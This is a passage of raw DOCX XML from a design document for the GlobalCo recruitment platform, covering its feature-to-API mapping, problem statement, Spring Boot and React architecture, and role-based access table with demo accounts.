            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CandidateProfileService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>candidate_profiles, skills</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Compatibility Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MatchScoreBreakdown Modal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/jobs/{id}/match</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CandidateProfileService.match()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>profile_skills, job_skills</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Applying for a Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1-Click Apply Button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/jobs/{id}/apply</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ApplicationService.apply()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>applications (UNIQUE key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Interview Scheduling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ScheduleInterviewModal.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/interviews/schedule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>InterviewService.schedule()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>interviews, notifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Issuing an Offer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OfferGenerationModal.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/offers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OfferService.createOffer()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>offers, applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>3. Real-World Problem Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Industry Problem Statement: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Traditional recruitment systems, generic job boards, and legacy corporate applicant tracking systems suffer from four severe operational and architectural breakdowns:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The 'Application Black Hole': Job applicants submit resumes into traditional portals and receive zero feedback. They cannot see what stage their resume is in, whether an interviewer has reviewed it, or why they were rejected. GlobalCo provides real-time 6-stage pipeline tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Unqualified Applicant Overwhelm: Recruiters receive hundreds of spam applications with zero relevance to the requisition. GlobalCo's Algorithmic Match Engine calculates multi-factor compatibility scores (skills 50%, experience 25%, location 25%), allowing recruiters to rank applicants objectively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Fragmented Tooling &amp; Manual Scheduling: Hiring teams waste hours coordinating calendars, generating meeting links across Google Meet / Microsoft Teams, and emailing offer letters manually. GlobalCo unifies requisition posting, applicant scoring, interview dispatch with meeting links, and formal offer acceptance into one unified cockpit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>State Fragility &amp; Monolithic Session Locking: Legacy enterprise recruitment software relies on stateful HTTP session cookies (JSESSIONID) stored in server RAM, preventing horizontal auto-scaling across cloud clusters. GlobalCo uses completely stateless JWT Bearer tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>4. Architectural Solution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Architectural Solution: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GlobalCo delivers a high-cohesion, low-coupling solution that bridges modern frontend usability with robust enterprise backend reliability:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Decoupled 3-Tier Layered Architecture: Clean separation of presentation (React 18 SPA), business logic (Spring Boot 3.2.3 REST APIs), and persistence (Spring Data JPA + H2/MySQL).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Cryptographic Stateless Authentication: Eliminates server-side session affinity via JSON Web Tokens (JJWT 0.12.5) signed with HMAC-SHA256, allowing horizontal scale behind reverse proxies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Deterministic Multi-Factor Scoring: Computes skill overlap using mathematical set intersections combined with weighted distance and experience metrics, giving immediate transparency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ACID Transactional Integrity: Strict relational foreign keys and database-level UNIQUE constraints prevent race conditions and duplicate submissions under concurrent traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>5. Users &amp; Roles (Role-Based Access Control)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Security and authorization are governed by a strict Role-Based Access Control (RBAC) model. User records are associated with roles stored in the database and mapped directly to Spring Security's GrantedAuthority objects.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1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>User Persona</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Spring Security Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Default Demo Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Allowed Operations &amp; Workflows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Restricted Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate (Job Seeker)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ROLE_CANDIDATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>riya.backend / Password@123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Search jobs, view match score breakdown, 1-click apply, bookmark jobs, manage skills/profile, track applications, accept/decline offers, join Google Meet interviews.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cannot post jobs, view other applicants, change pipeline status, or access admin telemetry.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter (Talent Team)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ROLE_RECRUITER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>mira.recruiter / Password@123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
